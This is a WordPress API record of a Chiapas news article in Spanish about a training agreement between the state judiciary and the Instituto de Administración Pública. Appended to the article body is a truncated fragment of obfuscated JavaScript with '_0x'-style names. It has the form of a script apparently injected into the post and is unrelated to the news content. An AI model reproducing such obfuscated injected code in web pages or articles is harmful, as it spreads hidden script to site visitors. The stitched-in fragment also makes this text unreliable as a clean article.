{"id":19877,"date":"2025-01-17T04:18:36","date_gmt":"2025-01-17T04:18:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19877"},"modified":"2025-01-17T04:18:37","modified_gmt":"2025-01-17T04:18:37","slug":"capacitacion-y-justicia-poder-judicial-del-estado-y-el-instituto-de-administracion-publica-impulsan-la-transformacion-del-servicio-publico","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19877","title":{"rendered":"Capacitaci\u00f3n y justicia: Poder Judicial del Estado y el Instituto de Administraci\u00f3n P\u00fablica impulsan la transformaci\u00f3n del servicio p\u00fablico"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-1024x681.jpg\" alt=\"\" class=\"wp-image-19878\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250116-WA0017-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>16 de enero del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, y la presidenta del Instituto de Administraci\u00f3n P\u00fablica del Estado, A.C. (IAP), Lysette Raquel Lameiro Camacho, firmaron un convenio de colaboraci\u00f3n en materia de capacitaci\u00f3n y programas acad\u00e9micos, con el objetivo de fortalecer el servicio p\u00fablico en la entidad a trav\u00e9s de la profesionalizaci\u00f3n.<\/p>\n\n\n\n<p>Durante la ceremonia, el magistrado presidente subray\u00f3 la relevancia de esta alianza estrat\u00e9gica, que busca fortalecer las capacidades de las y los servidores del pueblo mediante la oferta acad\u00e9mica del IAP. Adem\u00e1s, resalt\u00f3 que la formaci\u00f3n continua es clave para mejorar el servicio p\u00fablico, uno de los pilares de la nueva era de justicia humanista que impulsa la casa de la justicia de Chiapas.<\/p>\n\n\n\n<p>Asimismo, Moreno Guill\u00e9n y Lameiro Camacho, teniendo como testigos de honor en esta firma al secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez, y al consejero jur\u00eddico de Gobierno del Estado, Guillermo Nieto Arreola; destacaron que la capacitaci\u00f3n de las y los servidores ser\u00e1 fundamental para elevar la calidad de la atenci\u00f3n a la ciudadan\u00eda.<\/p>\n\n\n\n<p>A trav\u00e9s de las estrategias coordinadas que se deriven de este convenio, se buscar\u00e1 consolidar una gesti\u00f3n p\u00fablica m\u00e1s sensible y humana, con la justicia como eje central, plural y transparente.<\/p>\n\n\n\n<p>Finalmente, el magistrado presidente reiter\u00f3 el compromiso del Poder Judicial con la transformaci\u00f3n de la justicia en Chiapas, celebrando la uni\u00f3n con el IAP como un paso decisivo hacia una profesionalizaci\u00f3n con enfoque humanista, que beneficiar\u00e1 tanto a las instituciones como a la poblaci\u00f3n chiapaneca.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 16 de enero del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, y la presidenta del Instituto de Administraci\u00f3n P\u00fablica del Estado, A.C. (IAP), Lysette Raquel Lameiro Camacho, firmaron un convenio de colaboraci\u00f3n en materia de capacitaci\u00f3n y programas acad\u00e9micos, con el objetivo de fortalecer el servicio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19878,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19877","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19877","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19877"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19877\/revisions"}],"predecessor-version":[{"id":19879,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19877\/revisions\/19879"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19878"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19877"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19877"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19877"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}